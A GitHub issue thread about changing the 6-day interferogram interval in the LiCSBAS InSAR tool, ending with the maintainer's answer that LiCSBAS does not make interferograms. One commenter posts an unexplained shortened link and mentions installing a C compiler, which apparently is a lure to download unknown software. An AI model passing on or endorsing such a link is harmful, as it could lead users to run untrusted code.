### ISSUE TITLE
Is there any chance to change the 6-day date intervals?

### ISSUE THREAD

**Issue by geomaticss** [yumorishita/LiCSBAS#406]
For example, I want my data to be obtained in 12-day periods. I checked this by examining the batch_LiCSBAS.sh file, but I did not notice a line about time intervals. Do you have any idea about this?

**Comment by Buqra55** [comment]
I think this will help you.
https://bit.ly/4gwC82r

you may need to install the c compiler

**Comment by yumorishita** [comment]
LiCSBAS does not create interferograms. You need to create them yourself or contact COMET.
